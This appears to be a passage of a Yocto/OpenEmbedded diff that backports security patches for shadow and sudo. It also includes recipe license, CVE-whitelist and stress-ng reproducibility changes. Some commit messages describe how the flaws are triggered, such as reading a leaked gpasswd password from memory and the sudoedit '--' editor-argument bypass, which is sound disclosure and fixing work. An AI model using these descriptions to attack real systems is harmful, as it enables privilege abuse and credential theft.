44 | break; | ||
45 | } | ||
46 | } | ||
47 | |||
48 | - if (0 == err) { | ||
49 | - /* Search if there are non-printable or control characters */ | ||
50 | - for (cp = field; '\0' != *cp; cp++) { | ||
51 | - if (!isprint (*cp)) { | ||
52 | - err = 1; | ||
53 | - } | ||
54 | - if (!iscntrl (*cp)) { | ||
55 | - err = -1; | ||
56 | - break; | ||
57 | - } | ||
58 | - } | ||
59 | - } | ||
60 | - | ||
61 | return err; | ||
62 | } | ||
63 | |||
64 | -- | ||
65 | 2.34.1 | ||
66 | |||
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-29383.patch b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch new file mode 100644 index 0000000000..dbf4a508e9 --- /dev/null +++ b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch | |||
@@ -0,0 +1,54 @@ | |||
1 | From e5905c4b84d4fb90aefcd96ee618411ebfac663d Mon Sep 17 00:00:00 2001 | ||
2 | From: tomspiderlabs <128755403+tomspiderlabs@users.noreply.github.com> | ||
3 | Date: Thu, 23 Mar 2023 23:39:38 +0000 | ||
4 | Subject: [PATCH] Added control character check | ||
5 | |||
6 | Added control character check, returning -1 (to "err") if control characters are present. | ||
7 | |||
8 | CVE: CVE-2023-29383 | ||
9 | Upstream-Status: Backport | ||
10 | |||
11 | Reference to upstream: | ||
12 | https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d | ||
13 | |||
14 | Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com> | ||
15 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
16 | --- | ||
17 | lib/fields.c | 11 +++++++---- | ||
18 | 1 file changed, 7 insertions(+), 4 deletions(-) | ||
19 | |||
20 | diff --git a/lib/fields.c b/lib/fields.c | ||
21 | index 640be931..fb51b582 100644 | ||
22 | --- a/lib/fields.c | ||
23 | +++ b/lib/fields.c | ||
24 | @@ -21,9 +21,9 @@ | ||
25 | * | ||
26 | * The supplied field is scanned for non-printable and other illegal | ||
27 | * characters. | ||
28 | - * + -1 is returned if an illegal character is present. | ||
29 | - * + 1 is returned if no illegal characters are present, but the field | ||
30 | - * contains a non-printable character. | ||
31 | + * + -1 is returned if an illegal or control character is present. | ||
32 | + * + 1 is returned if no illegal or control characters are present, | ||
33 | + * but the field contains a non-printable character. | ||
34 | * + 0 is returned otherwise. | ||
35 | */ | ||
36 | int valid_field (const char *field, const char *illegal) | ||
37 | @@ -45,10 +45,13 @@ int valid_field (const char *field, const char *illegal) | ||
38 | } | ||
39 | |||
40 | if (0 == err) { | ||
41 | - /* Search if there are some non-printable characters */ | ||
42 | + /* Search if there are non-printable or control characters */ | ||
43 | for (cp = field; '\0' != *cp; cp++) { | ||
44 | if (!isprint (*cp)) { | ||
45 | err = 1; | ||
46 | + } | ||
47 | + if (!iscntrl (*cp)) { | ||
48 | + err = -1; | ||
49 | break; | ||
50 | } | ||
51 | } | ||
52 | -- | ||
53 | 2.34.1 | ||
54 | |||
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-4641.patch b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch new file mode 100644 index 0000000000..75dbbad299 --- /dev/null +++ b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch | |||
@@ -0,0 +1,146 @@ | |||
1 | From 51731b01fd9a608397da22b7b9164e4996f3d4c6 Mon Sep 17 00:00:00 2001 | ||
2 | From: Alejandro Colomar <alx@kernel.org> | ||
3 | Date: Sat, 10 Jun 2023 16:20:05 +0200 | ||
4 | Subject: [PATCH] gpasswd(1): Fix password leak | ||
5 | |||
6 | CVE: CVE-2023-4641 | ||
7 | Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/65c88a43a23c2391dcc90c0abda3e839e9c57904] | ||
8 | |||
9 | How to trigger this password leak? | ||
10 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | ||
11 | |||
12 | When gpasswd(1) asks for the new password, it asks twice (as is usual | ||
13 | for confirming the new password). Each of those 2 password prompts | ||
14 | uses agetpass() to get the password. If the second agetpass() fails, | ||
15 | the first password, which has been copied into the 'static' buffer | ||
16 | 'pass' via STRFCPY(), wasn't being zeroed. | ||
17 | |||
18 | agetpass() is defined in <./libmisc/agetpass.c> (around line 91), and | ||
19 | can fail for any of the following reasons: | ||
20 | |||
21 | - malloc(3) or readpassphrase(3) failure. | ||
22 | |||
23 | These are going to be difficult to trigger. Maybe getting the system | ||
24 | to the limits of memory utilization at that exact point, so that the | ||
25 | next malloc(3) gets ENOMEM, and possibly even the OOM is triggered. | ||
26 | About readpassphrase(3), ENFILE and EINTR seem the only plausible | ||
27 | ones, and EINTR probably requires privilege or being the same user; | ||
28 | but I wouldn't discard ENFILE so easily, if a process starts opening | ||
29 | files. | ||
30 | |||
31 | - The password is longer than PASS_MAX. | ||
32 | |||
33 | The is plausible with physical access. However, at that point, a | ||
34 | keylogger will be a much simpler attack. | ||
35 | |||
36 | And, the attacker must be able to know when the second password is being | ||
37 | introduced, which is not going to be easy. | ||
38 | |||
39 | How to read the password after the leak? | ||
40 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | ||
41 | |||
42 | Provoking the leak yourself at the right point by entering a very long | ||
43 | password is easy, and inspecting the process stack at that point should | ||
44 | be doable. Try to find some consistent patterns. | ||
45 | |||
46 | Then, search for those patterns in free memory, right after the victim | ||
47 | leaks their password. | ||
48 | |||
49 | Once you get the leak, a program should read all the free memory | ||
50 | searching for patterns that gpasswd(1) leaves nearby the leaked | ||
51 | password. | ||
52 | |||
53 | On 6/10/23 03:14, Seth Arnold wrote: | ||
54 | > An attacker process wouldn't be able to use malloc(3) for this task. | ||
55 | > There's a handful of tools available for userspace to allocate memory: | ||
56 | > | ||
57 | > - brk / sbrk | ||
58 | > - mmap MAP_ANONYMOUS | ||
59 | > - mmap /dev/zero | ||
60 | > - mmap some other file | ||
61 | > - shm_open | ||
62 | > - shmget | ||
63 | > | ||
64 | > Most of these return only pages of zeros to a process. Using mmap of an | ||
65 | > existing file, you can get some of the contents of the file demand-loaded | ||
66 | > into the memory space on the first use. | ||
67 | > | ||
68 | > The MAP_UNINITIALIZED flag only works if the kernel was compiled with | ||
69 | > CONFIG_MMAP_ALLOW_UNINITIALIZED. This is rare. | ||
70 | > | ||
71 | > malloc(3) doesn't zero memory, to our collective frustration, but all the | ||
72 | > garbage in the allocations is from previous allocations in the current | ||
73 | > process. It isn't leftover from other processes. | ||
74 | > | ||
75 | > The avenues available for reading the memory: | ||
76 | > - /dev/mem and /dev/kmem (requires root, not available with Secure Boot) | ||
77 | > - /proc/pid/mem (requires ptrace privileges, mediated by YAMA) | ||
78 | > - ptrace (requires ptrace privileges, mediated by YAMA) | ||
79 | > - causing memory to be swapped to disk, and then inspecting the swap | ||
80 | > | ||
81 | > These all require a certain amount of privileges. | ||
82 | |||
83 | How to fix it? | ||
84 | ~~~~~~~~~~~~~~ | ||
85 | |||
86 | memzero(), which internally calls explicit_bzero(3), or whatever | ||
87 | alternative the system provides with a slightly different name, will | ||
88 | make sure that the buffer is zeroed in memory, and optimizations are not | ||
89 | allowed to impede this zeroing. | ||
90 | |||
91 | This is not really 100% effective, since compilers may place copies of | ||
92 | the string somewhere hidden in the stack. Those copies won't get zeroed | ||
93 | by explicit_bzero(3). However, that's arguably a compiler bug, since | ||
94 | compilers should make everything possible to avoid optimizing strings | ||
95 | that are later passed to explicit_bzero(3). But we all know that | ||
96 | sometimes it's impossible to have perfect knowledge in the compiler, so | ||
97 | this is plausible. Nevertheless, there's nothing we can do against such | ||
98 | issues, except minimizing the time such passwords are stored in plain | ||
99 | text. | ||
100 | |||
101 | Security concerns | ||
102 | ~~~~~~~~~~~~~~~~~ | ||
103 | |||
104 | We believe this isn't easy to exploit. Nevertheless, and since the fix | ||
105 | is trivial, this fix should probably be applied soon, and backported to | ||
106 | all supported distributions, to prevent someone else having more | ||
107 | imagination than us to find a way. | ||
108 | |||
109 | Affected versions | ||
110 | ~~~~~~~~~~~~~~~~~ | ||
111 | |||
112 | All. Bug introduced in shadow 19990709. That's the second commit in | ||
113 | the git history. | ||
114 | |||
115 | Fixes: 45c6603cc86c ("[svn-upgrade] Integrating new upstream version, shadow (19990709)") | ||
116 | Reported-by: Alejandro Colomar <alx@kernel.org> | ||
117 | Cc: Serge Hallyn <serge@hallyn.com> | ||
118 | Cc: Iker Pedrosa <ipedrosa@redhat.com> | ||
119 | Cc: Seth Arnold <seth.arnold@canonical.com> | ||
120 | Cc: Christian Brauner <christian@brauner.io> | ||
121 | Cc: Balint Reczey <rbalint@debian.org> | ||
122 | Cc: Sam James <sam@gentoo.org> | ||
123 | Cc: David Runge <dvzrv@archlinux.org> | ||
124 | Cc: Andreas Jaeger <aj@suse.de> | ||
125 | Cc: <~hallyn/shadow@lists.sr.ht> | ||
126 | Signed-off-by: Alejandro Colomar <alx@kernel.org> | ||
127 | Signed-off-by: Hugo SIMELIERE <hsimeliere.opensource@witekio.com> | ||
128 | --- | ||
129 | src/gpasswd.c | 1 + | ||
130 | 1 file changed, 1 insertion(+) | ||
131 | |||
132 | diff --git a/src/gpasswd.c b/src/gpasswd.c | ||
133 | index 4d75af96..a698b32a 100644 | ||
134 | --- a/src/gpasswd.c | ||
135 | +++ b/src/gpasswd.c | ||
136 | @@ -918,6 +918,7 @@ static void change_passwd (struct group *gr) | ||
137 | strzero (cp); | ||
138 | cp = getpass (_("Re-enter new password: ")); | ||
139 | if (NULL == cp) { | ||
140 | + memzero (pass, sizeof pass); | ||
141 | exit (1); | ||
142 | } | ||
143 | |||
144 | -- | ||
145 | 2.42.0 | ||
146 | |||
diff --git a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb index 5f7ea00bf1..4e68f826c6 100644 --- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb +++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb | |||
@@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass" | |||
2 | HOMEPAGE = "http://github.com/shadow-maint/shadow" | 2 | HOMEPAGE = "http://github.com/shadow-maint/shadow" |
3 | BUGTRACKER = "http://github.com/shadow-maint/shadow/issues" | 3 | BUGTRACKER = "http://github.com/shadow-maint/shadow/issues" |
4 | SECTION = "base utils" | 4 | SECTION = "base utils" |
5 | LICENSE = "BSD | Artistic-1.0" | 5 | LICENSE = "BSD-3-Clause | Artistic-1.0" |
6 | LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5" | 6 | LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5" |
7 | 7 | ||
8 | DEPENDS = "base-passwd" | 8 | DEPENDS = "base-passwd" |
diff --git a/meta/recipes-extended/shadow/shadow.inc b/meta/recipes-extended/shadow/shadow.inc index f86e5e03c0..c16292c38a 100644 --- a/meta/recipes-extended/shadow/shadow.inc +++ b/meta/recipes-extended/shadow/shadow.inc | |||
@@ -1,8 +1,9 @@ | |||
1 | SUMMARY = "Tools to change and administer password and group data" | 1 | SUMMARY = "Tools to change and administer password and group data" |
2 | HOMEPAGE = "http://github.com/shadow-maint/shadow" | 2 | HOMEPAGE = "http://github.com/shadow-maint/shadow" |
3 | DESCRIPTION = "${SUMMARY}" | ||
3 | BUGTRACKER = "http://github.com/shadow-maint/shadow/issues" | 4 | BUGTRACKER = "http://github.com/shadow-maint/shadow/issues" |
4 | SECTION = "base/utils" | 5 | SECTION = "base/utils" |
5 | LICENSE = "BSD | Artistic-1.0" | 6 | LICENSE = "BSD-3-Clause | Artistic-1.0" |
6 | LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \ | 7 | LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \ |
7 | file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af" | 8 | file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af" |
8 | 9 | ||
@@ -13,6 +14,9 @@ SRC_URI = "https://github.com/shadow-maint/shadow/releases/download/${PV}/${BP}. | |||
13 | file://shadow-4.1.3-dots-in-usernames.patch \ | 14 | file://shadow-4.1.3-dots-in-usernames.patch \ |
14 | ${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \ | 15 | ${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \ |
15 | file://shadow-relaxed-usernames.patch \ | 16 | file://shadow-relaxed-usernames.patch \ |
17 | file://CVE-2023-29383.patch \ | ||
18 | file://0001-Overhaul-valid_field.patch \ | ||
19 | file://CVE-2023-4641.patch \ | ||
16 | " | 20 | " |
17 | 21 | ||
18 | SRC_URI_append_class-target = " \ | 22 | SRC_URI_append_class-target = " \ |
diff --git a/meta/recipes-extended/shadow/shadow_4.8.1.bb b/meta/recipes-extended/shadow/shadow_4.8.1.bb index c975395ff8..9dfcd4bc10 100644 --- a/meta/recipes-extended/shadow/shadow_4.8.1.bb +++ b/meta/recipes-extended/shadow/shadow_4.8.1.bb | |||
@@ -6,5 +6,10 @@ BUILD_LDFLAGS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'p | |||
6 | 6 | ||
7 | BBCLASSEXTEND = "native nativesdk" | 7 | BBCLASSEXTEND = "native nativesdk" |
8 | 8 | ||
9 | # Severity is low and marked as closed and won't fix. | ||
10 | # https://bugzilla.redhat.com/show_bug.cgi?id=884658 | ||
11 | CVE_CHECK_WHITELIST += "CVE-2013-4235" | ||
9 | 12 | ||
13 | # This is an issue for a different shadow | ||
14 | CVE_CHECK_WHITELIST += "CVE-2016-15024" | ||
10 | 15 | ||
diff --git a/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch new file mode 100644 index 0000000000..9dfca0441b --- /dev/null +++ b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch | |||
@@ -0,0 +1,26 @@ | |||
1 | From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001 | ||
2 | From: Alexander Kanavin <alex@linutronix.de> | ||
3 | Date: Sat, 23 Oct 2021 20:20:59 +0200 | ||
4 | Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage. | ||
5 | |||
6 | This helps reproducibility. | ||
7 | |||
8 | Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156] | ||
9 | Signed-off-by: Alexander Kanavin <alex@linutronix.de> | ||
10 | --- | ||
11 | Makefile | 2 +- | ||
12 | 1 file changed, 1 insertion(+), 1 deletion(-) | ||
13 | |||
14 | diff --git a/Makefile b/Makefile | ||
15 | index 886018f9..f4290f9c 100644 | ||
16 | --- a/Makefile | ||
17 | +++ b/Makefile | ||
18 | @@ -412,7 +412,7 @@ git-commit-id.h: | ||
19 | $(OBJS): stress-ng.h Makefile | ||
20 | |||
21 | stress-ng.1.gz: stress-ng.1 | ||
22 | - gzip -c $< > $@ | ||
23 | + gzip -n -c $< > $@ | ||
24 | |||
25 | .PHONY: dist | ||
26 | dist: | ||
diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb index 9b987c7bde..cf94e0275b 100644 --- a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb +++ b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb | |||
@@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/" | |||
5 | LICENSE = "GPLv2" | 5 | LICENSE = "GPLv2" |
6 | LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" | 6 | LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" |
7 | 7 | ||
8 | SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \ | 8 | SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \ |
9 | file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \ | 9 | file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \ |
10 | file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \ | ||
10 | " | 11 | " |
11 | SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae" | 12 | SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596" |
12 | SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0" | 13 | S = "${WORKDIR}/git" |
13 | 14 | ||
14 | DEPENDS = "coreutils-native" | 15 | DEPENDS = "coreutils-native" |
15 | 16 | ||
diff --git a/meta/recipes-extended/sudo/files/CVE-2023-22809.patch b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch new file mode 100644 index 0000000000..6c47eb3e44 --- /dev/null +++ b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch | |||
@@ -0,0 +1,113 @@ | |||
1 | Backport of: | ||
2 | |||
3 | # HG changeset patch | ||
4 | # Parent 7275148cad1f8cd3c350026460acc4d6ad349c3a | ||
5 | sudoedit: do not permit editor arguments to include "--" | ||
6 | We use "--" to separate the editor and arguments from the files to edit. | ||
7 | If the editor arguments include "--", sudo can be tricked into allowing | ||
8 | the user to edit a file not permitted by the security policy. | ||
9 | Thanks to Matthieu Barjole and Victor Cutillas of Synacktiv | ||
10 | (https://synacktiv.com) for finding this bug. | ||
11 | |||
12 | CVE: CVE-2023-22809 | ||
13 | Upstream-Staus: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz] | ||
14 | Signed-off-by: Omkar Patil <omkar.patil@kpit.com> | ||
15 | |||
16 | --- a/plugins/sudoers/editor.c | ||
17 | +++ b/plugins/sudoers/editor.c | ||
18 | @@ -56,7 +56,7 @@ resolve_editor(const char *ed, size_t ed | ||
19 | const char *cp, *ep, *tmp; | ||
20 | const char *edend = ed + edlen; | ||
21 | struct stat user_editor_sb; | ||
22 | - int nargc; | ||
23 | + int nargc = 0; | ||
24 | debug_decl(resolve_editor, SUDOERS_DEBUG_UTIL) | ||
25 | |||
26 | /* | ||
27 | @@ -102,6 +102,21 @@ resolve_editor(const char *ed, size_t ed | ||
28 | free(editor_path); | ||
29 | while (nargc--) | ||
30 | free(nargv[nargc]); | ||
31 | + free(nargv); | ||
32 | + debug_return_str(NULL); | ||
33 | + } | ||
34 | + | ||
35 | + /* | ||
36 | + * We use "--" to separate the editor and arguments from the files | ||
37 | + * to edit. The editor arguments themselves may not contain "--". | ||
38 | + */ | ||
39 | + if (strcmp(nargv[nargc], "--") == 0) { | ||
40 | + sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed); | ||
41 | + sudo_warnx("%s", U_("editor arguments may not contain \"--\"")); | ||
42 | + errno = EINVAL; | ||
43 | + free(editor_path); | ||
44 | + while (nargc--) | ||
45 | + free(nargv[nargc]); | ||
46 | free(nargv); | ||
47 | debug_return_str(NULL); | ||
48 | } | ||
49 | --- a/plugins/sudoers/sudoers.c | ||
50 | +++ b/plugins/sudoers/sudoers.c | ||
51 | @@ -616,20 +616,31 @@ sudoers_policy_main(int argc, char * con | ||
52 | |||
53 | /* Note: must call audit before uid change. */ | ||
54 | if (ISSET(sudo_mode, MODE_EDIT)) { | ||
55 | + const char *env_editor = NULL; | ||
56 | int edit_argc; | ||
57 | - const char *env_editor; | ||
58 | |||
59 | free(safe_cmnd); | ||
60 | safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc, | ||
61 | &edit_argv, NULL, &env_editor, false); | ||
62 | if (safe_cmnd == NULL) { | ||
63 | - if (errno != ENOENT) | ||
64 | + switch (errno) { | ||
65 | + case ENOENT: | ||
66 | + audit_failure(NewArgc, NewArgv, N_("%s: command not found"), | ||
67 | + env_editor ? env_editor : def_editor); | ||
68 | + sudo_warnx(U_("%s: command not found"), | ||
69 | + env_editor ? env_editor : def_editor); | ||
70 | + goto bad; | ||
71 | + case EINVAL: | ||
72 | + if (def_env_editor && env_editor != NULL) { | ||
73 | + /* User tried to do something funny with the editor. */ | ||
74 | + log_warningx(SLOG_NO_STDERR|SLOG_SEND_MAIL, | ||
75 | + "invalid user-specified editor: %s", env_editor); | ||
76 | + goto bad; | ||
77 | + } | ||
78 | + /* FALLTHROUGH */ | ||
79 | + default: | ||
80 | goto done; | ||
81 | - audit_failure(NewArgc, NewArgv, N_("%s: command not found"), | ||
82 | - env_editor ? env_editor : def_editor); | ||
83 | - sudo_warnx(U_("%s: command not found"), | ||
84 | - env_editor ? env_editor : def_editor); | ||
85 | - goto bad; | ||
86 | + } | ||
87 | } | ||
88 | if (audit_success(edit_argc, edit_argv) != 0 && !def_ignore_audit_errors) | ||
89 | goto done; | ||
90 | --- a/plugins/sudoers/visudo.c | ||
91 | +++ b/plugins/sudoers/visudo.c | ||
92 | @@ -308,7 +308,7 @@ static char * | ||
93 | get_editor(int *editor_argc, char ***editor_argv) | ||
94 | { | ||
95 | char *editor_path = NULL, **whitelist = NULL; | ||
96 | - const char *env_editor; | ||
97 | + const char *env_editor = NULL; | ||
98 | static char *files[] = { "+1", "sudoers" }; | ||
99 | unsigned int whitelist_len = 0; | ||
100 | debug_decl(get_editor, SUDOERS_DEBUG_UTIL) | ||
101 | @@ -342,7 +342,11 @@ get_editor(int *editor_argc, char ***edi | ||
102 | if (editor_path == NULL) { | ||
103 | if (def_env_editor && env_editor != NULL) { | ||
104 | /* We are honoring $EDITOR so this is a fatal error. */ | ||
105 | - sudo_fatalx(U_("specified editor (%s) doesn't exist"), env_editor); | ||
106 | + if (errno == ENOENT) { | ||
107 | + sudo_warnx(U_("specified editor (%s) doesn't exist"), | ||
108 | + env_editor); | ||
109 | + } | ||
110 | + exit(EXIT_FAILURE); | ||
111 | } | ||
112 | sudo_fatalx(U_("no editor found (editor path = %s)"), def_editor); | ||
113 | } | ||
diff --git a/meta/recipes-extended/sudo/sudo.inc b/meta/recipes-extended/sudo/sudo.inc index aeedfc1a23..9c7279d25a 100644 --- a/meta/recipes-extended/sudo/sudo.inc +++ b/meta/recipes-extended/sudo/sudo.inc | |||
@@ -3,7 +3,7 @@ DESCRIPTION = "Sudo (superuser do) allows a system administrator to give certain | |||
3 | HOMEPAGE = "http://www.sudo.ws" | 3 | HOMEPAGE = "http://www.sudo.ws" |
4 | BUGTRACKER = "http://www.sudo.ws/bugs/" | 4 | BUGTRACKER = "http://www.sudo.ws/bugs/" |
5 | SECTION = "admin" | 5 | SECTION = "admin" |
6 | LICENSE = "ISC & BSD & Zlib" | 6 | LICENSE = "ISC & BSD-3-Clause & BSD-2-Clause & Zlib" |
7 | LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \ | 7 | LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \ |
8 | file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \ | 8 | file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \ |
9 | file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \ | 9 | file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \ |
@@ -49,3 +49,5 @@ do_compile_prepend () { | |||
49 | do_install_prepend (){ | 49 | do_install_prepend (){ |
50 | mkdir -p ${D}/${localstatedir}/lib | 50 | mkdir -p ${D}/${localstatedir}/lib |
51 | } | 51 | } |
52 | |||
53 | CVE_VERSION_SUFFIX = "patch" | ||
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch new file mode 100644 index 0000000000..1336c7701d --- /dev/null +++ b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch | |||
@@ -0,0 +1,59 @@ | |||
1 | From e1554d7996a59bf69544f3d8dd4ae683027948f9 Mon Sep 17 00:00:00 2001 | ||
2 | From: Hitendra Prajapati <hprajapati@mvista.com> | ||
3 | Date: Tue, 15 Nov 2022 09:17:18 +0530 | ||
4 | Subject: [PATCH] CVE-2022-43995 | ||
5 | |||
6 | Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/bd209b9f16fcd1270c13db27ae3329c677d48050] | ||
7 | CVE: CVE-2022-43995 | ||
8 | Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> | ||
9 | |||
10 | Potential heap overflow for passwords < 8 | ||
11 | characters. Starting with sudo 1.8.0 the plaintext password buffer is | ||
12 | dynamically sized so it is not safe to assume that it is at least 9 bytes in | ||
13 | size. | ||
14 | Found by Hugo Lefeuvre (University of Manchester) with ConfFuzz. | ||
15 | --- | ||
16 | plugins/sudoers/auth/passwd.c | 11 +++++------ | ||
17 | 1 file changed, 5 insertions(+), 6 deletions(-) | ||
18 | |||
19 | diff --git a/plugins/sudoers/auth/passwd.c b/plugins/sudoers/auth/passwd.c | ||
20 | index 03c7a16..76a7824 100644 | ||
21 | --- a/plugins/sudoers/auth/passwd.c | ||
22 | +++ b/plugins/sudoers/auth/passwd.c | ||
23 | @@ -63,7 +63,7 @@ sudo_passwd_init(struct passwd *pw, sudo_auth *auth) | ||
24 | int | ||
25 | sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_conv_callback *callback) | ||
26 | { | ||
27 | - char sav, *epass; | ||
28 | + char des_pass[9], *epass; | ||
29 | char *pw_epasswd = auth->data; | ||
30 | size_t pw_len; | ||
31 | int matched = 0; | ||
32 | @@ -75,12 +75,12 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c | ||
33 | |||
34 | /* | ||
35 | * Truncate to 8 chars if standard DES since not all crypt()'s do this. | ||
36 | - * If this turns out not to be safe we will have to use OS #ifdef's (sigh). | ||
37 | */ | ||
38 | - sav = pass[8]; | ||
39 | pw_len = strlen(pw_epasswd); | ||
40 | - if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) | ||
41 | - pass[8] = '\0'; | ||
42 | + if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) { | ||
43 | + strlcpy(des_pass, pass, sizeof(des_pass)); | ||
44 | + pass = des_pass; | ||
45 | + } | ||
46 | |||
47 | /* | ||
48 | * Normal UN*X password check. | ||
49 | @@ -88,7 +88,6 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c | ||
50 | * only compare the first DESLEN characters in that case. | ||
51 | */ | ||
52 | epass = (char *) crypt(pass, pw_epasswd); | ||
53 | - pass[8] = sav; | ||
54 | if (epass != NULL) { | ||
55 | if (HAS_AGEINFO(pw_epasswd, pw_len) && strlen(epass) == DESLEN) | ||
56 | matched = !strncmp(pw_epasswd, epass, DESLEN); | ||
57 | -- | ||
58 | 2.25.1 | ||
59 | |||
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch new file mode 100644 index 0000000000..bc6f8c19a6 --- /dev/null +++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch | |||
@@ -0,0 +1,646 @@ | |||
1 | Origin: Backport obtained from SUSE. Thanks! | ||
2 | |||
3 | From 334daf92b31b79ce68ed75e2ee14fca265f029ca Mon Sep 17 00:00:00 2001 | ||
4 | From: "Todd C. Miller" <Todd.Miller@sudo.ws> | ||
5 | Date: Wed, 18 Jan 2023 08:21:34 -0700 | ||
6 | Subject: [PATCH] Escape control characters in log messages and "sudoreplay -l" | ||
7 | output. The log message contains user-controlled strings that could include | ||
8 | things like terminal control characters. Space characters in the command | ||
9 | path are now also escaped. | ||
10 | |||
11 | Command line arguments that contain spaces are surrounded with | ||
12 | single quotes and any literal single quote or backslash characters | ||
13 | are escaped with a backslash. This makes it possible to distinguish | ||
14 | multiple command line arguments from a single argument that contains | ||
15 | spaces. | ||
16 | |||
17 | Issue found by Matthieu Barjole and Victor Cutillas of Synacktiv | ||
18 | (https://synacktiv.com). | ||
19 | |||
20 | Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-1.patch?h=ubuntu/focal-security | ||
21 | Upstream commit https://github.com/sudo-project/sudo/commit/334daf92b31b79ce68ed75e2ee14fca265f029ca] | ||
22 | CVE: CVE-2023-28486 CVE-2023-28487 | ||
23 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
24 | --- | ||
25 | doc/sudoers.man.in | 33 +++++++-- | ||
26 | doc/sudoers.mdoc.in | 28 ++++++-- | ||
27 | doc/sudoreplay.man.in | 9 ++ | ||
28 | doc/sudoreplay.mdoc.in | 10 ++ | ||
29 | include/sudo_compat.h | 6 + | ||
30 | include/sudo_lbuf.h | 7 ++ | ||
31 | lib/util/lbuf.c | 106 +++++++++++++++++++++++++++++++ | ||
32 | lib/util/util.exp.in | 1 | ||
33 | plugins/sudoers/logging.c | 145 +++++++++++-------------------------------- | ||
